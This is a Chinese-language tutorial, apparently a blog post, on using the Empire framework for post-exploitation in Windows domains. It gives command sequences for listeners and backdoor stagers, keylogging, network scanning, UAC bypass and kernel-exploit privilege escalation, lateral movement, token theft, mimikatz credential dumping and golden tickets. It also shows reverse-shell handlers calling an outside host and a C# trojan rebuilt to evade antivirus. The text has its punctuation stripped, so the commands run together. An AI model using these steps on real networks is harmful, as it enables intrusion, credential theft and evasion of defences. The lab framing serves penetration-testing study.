PowerShellEmpire的后渗透利用

　　Empire后渗透框架主要用于Windows内网渗透，该框架主要基于Powershell和Python，它提供了一个模块的架构，帮助攻击者可以创建和执行各种攻击策略，支持包括域内渗透、宏钓鱼、内网横向、权限维持、后门生成等多个模块。
　　官网：http：www。powershellempire。com0x01下载安装
　　安装Empire由两种方式，分别是基于源码安装和apt包安装源码安装
　　在Github中下载Empiregitclonehttps：github。comEmpireProjectEmpire
　　直接安装Empire会报错。setupinstall。sh
　　需要安装以下Python库，当然在安装库时会遇到很多问题，以下是遇到问题后的解决方法pipinstallpyOpenSSLpipinstalliptoolspipinstallnetifacespipinstallpydispatchpipinstallpydispatcherpipinstallzlibwrapperpipinstallmacholibpipinstallxlrdpipinstallxlutilspipinstallpyminifierpipinstalldropboxpipinstallpefile
　　importlib无法安装解决方法aptgetinstallbuildessentialpython3devpython2devlibssldevswig
　　M2Crypto无法安装解决方法pipinstallDesktopM2Crypto0。38。0。tar。gz
　　dispatch无法安装解决方法pipinstallupgradesetuptools
　　CryPto。Cipher报错解决方法pipuninstallcryptopipinstallpycrypto
　　下载地址：https：pypi。orgprojectM2Cryptofiles
　　安装完成后成功启动Empire
　　APT包安装
　　使用apt包安装Empireaptinstallpowershellempirepowershellempire
　　0x02基础使用设置监听器
　　进入Empire输入help可查看帮助文档
　　输入listeners进入监听器设置，按tab自动补全（如果不清楚均可使用该方法）
　　设置http监听器uselistenerhttpinfo查看监听器信息
　　在监听器模块中带有True属性的值必须填写，其他属性可能会存在默认值，使用set和unset可改变设置，首先设置监听器名为testsetNametest
　　设置监听默认是80端口，但是80端口通常是Web服务器，修改端口为8080setHosthttp：172。16。54。51：8080setPort8080
　　开启监听器execute
　　删除监听器backlistkilltest
　　生成后门
　　使用usestager选择后门模块usestagerwindowslauncherbat
　　设置监听器和输出目录setListenertestsetOutFiletmplanuncher。bat默认输出tmp目录execute
　　在tmp目录成功找到生成后门
　　把输出的后门放入目标系统中执行，执行成功后收到响应活动代理
　　使用agents查看当前会话，通过interact进入会话agentsinteract22FLR8SU
　　如果觉得会话名称太过复杂，可重命名会话renamewin7
　　agents下可使用命令如下：
　　命令执行
　　查看系统信息sysinfo
　　查询agents命令helpagentscmds
　　执行终端命令shellwhoami
　　基本功能
　　使用截图功能sc
　　使用键盘记录usemodulecollectionkeyloggerexecute
　　使用剪切版usemodulecollectionclipboardmonitorexecute
　　0x03常见模块主机扫描
　　ARP扫描模块sleep0设置间隔时间usemodulesituationalawarenessnetworkarpscansetRange192。168。0。1192。168。0。100execute
　　SMB扫描模块usemodulesituationalawarenessnetworksmbscannersetUserNameadministratorsetPasswordmacexecute
　　端口扫描模块usemodulesituationalawarenessnetworkportscansetHosts192。168。0。1100setPorts445execute
　　信息收集
　　查找本地管理员主机usemodulesituationalawarenessnetworkpowerviewfindlocaladminaccessexecute
　　查看共享文件usemodulesituationalawarenessnetworkpowerviewsharefinderexecute
　　Windows本地信息收集usemodulesituationalawarenesshostwinenumexecute
　　权限提升
　　当前权限并非管理员，需要提权操作
　　使用UACbypass模块提权usemoduleprivescbypassuacsetListenertestexecute
　　使用powerup检查可提权项，找到后可利用环境向量提权usemoduleprivescpowerupallcheckssetListenertestexecute
　　使用计划任务进行提权usemodulepersistenceelevatedschtaskssetListenertestexecute
　　通过溢出漏洞提权，比如烂土豆漏洞
　　usemoduleprivescms16032或usemoduleprivescms16135setListenertestexecute
　　成功提权至SYSTEMagents
　　0x04域内渗透环境介绍DC：192。168。52。138T1：192。168。52。128192。168。0。100D1：192。168。52。141
　　当前已取得域内普通用户mac和本地管理员权限agents
　　信息收集
　　基础信息收集，包括系统信息、用户信息、网络环境等sysinfowhoamiinfo
　　使用ARP扫描，成功找到192。168。52。024存在四台主机usemodulesituationalawarenessnetworkarpscansetRange192。168。52。024execute
　　查找本地管理员usemodulesituationawarenessnetworkpowerviewfindlocaladminaccessexecute
　　查看当前用户是否为其他主机上的本地管理员shelldir192。168。52。141C
　　成功找到域控主机IP为192。168。52。138usemodulesituationawarenessnetworkpowerviewgetdomaincontrollerexecute
　　横向移动
　　使用会话注入需要管理员权限，切换本地管理员后把当前会话注入到其他主机上usemodulelateralmovementinvokepsexecsetListenertestsetComputerNamestu1execute
　　使用invokewmi模块相比invokepsexec更加隐蔽usemodulelateralmovementinvokewmisetListenertestsetComputerNamestu1execute
　　窃取token
　　在新会话中查看进程发现域管理员进程ps
　　选择目标PID号后窃取域管理员tokenstealtoken1740shelldirOWAC
　　如果需要恢复原来的身份可使用以下命令revtoself
　　凭证获取
　　利用mimikatz拿到管理员密码明文和哈希mimikatz
　　查看所有用户凭证如下：creds
　　利用哈希传递可拿到域控访问权限黄金票据
　　在域控下使用lsadump模块获取域内所有用户哈希usemodulecredentialsmimikatzlsadumpcreds
　　成功拿到krbtgt用户哈希
　　利用goldenticket制作黄金票据usemodulecredentialsmimikatzgoldenticketsetcredid10setuseradministratorexecute
　　0x05会话管理会话生成
　　使用spawn模块生成新会话usemodulemanagementspawnsetListenertestexecute
　　进程注入
　　查看进程并选择需注入的进程IDps
　　成功注入winlogon进程psinjecttest1120
　　注入这类系统进程不会出现蓝屏MSF会话联动
　　首先在MSF中设置http监听useexploitmultihandlersetpayloadwindowsmeterpreterreversehttpsetlhost192。168。0。50setlport4444exploitj
　　在Empire中设置反弹，其中payload需要与上对应usemodulecodeexecutioninvokeshellcodesetLhost192。168。0。50setLport4444setPayloadreversehttpexecute
　　经测试未受到反弹shell，查阅资料后发现Empire转到MSF存在局限性，具体可查看https：www。jianshu。compc5153ee1eb760x06EmpireWeb下载安装
　　Empire存在web版本，把PHP和Empire结合的方式通过网页进行访问
　　下载地址：https：github。cominterferencesecurityempireweb
　　下载empirewebgitclonehttps：github。cominterferencesecurityempireweb
　　安装PHP扩展，需根据本机的PHP版本进行修改aptgetinstallphp7。4curl
　　重启Apache后启用扩展etcinit。dapache2restart基础使用
　　设置绑定端口和登录账号密码。empirerestrestport1337usernameadminpassword3mpir3admin
　　访问站点输入账号密码admin3mpir3admin
　　成功登录能够可视化各个模块
　　查看Agents模块
　　查看已获取的用户凭证
　　查看文件系统
　　0x07免杀模块生成csharp木马
　　准备VisualStido用于编译C文件
　　下载地址：http：download。microsoft。comdownloadB0FB0F589EDF1B7478C849A02C8395D0995VS2012ULTchs。iso
　　生成C类型木马usestagerwindowscsharpexesetListenertestinfoexecute
　　成功生成后门文件launcher。src
　　csharp编译免杀
　　使用VisualStdio打开cmd。sln
　　需要安装。net2。0环境，打开程序与功能中的添加或删除程序安装net3。5版本，如果无法安装，打开组策略》系统〉指定可选组件安装和组件修复的设置
　　。net支持：https：dotnet。microsoft。comenusdownloadvisualstudiosdks
　　修改命名空间为mac123并添加花指令vara12345678；varb67890123；
　　完成后编译生成程序文件
　　免杀效果
　　使用火绒成功免杀
　　使用360成功免杀
　　但是执行后360会对行为查杀，上线则不受影响
　　成功进入新会话当中interactXWVH8ME2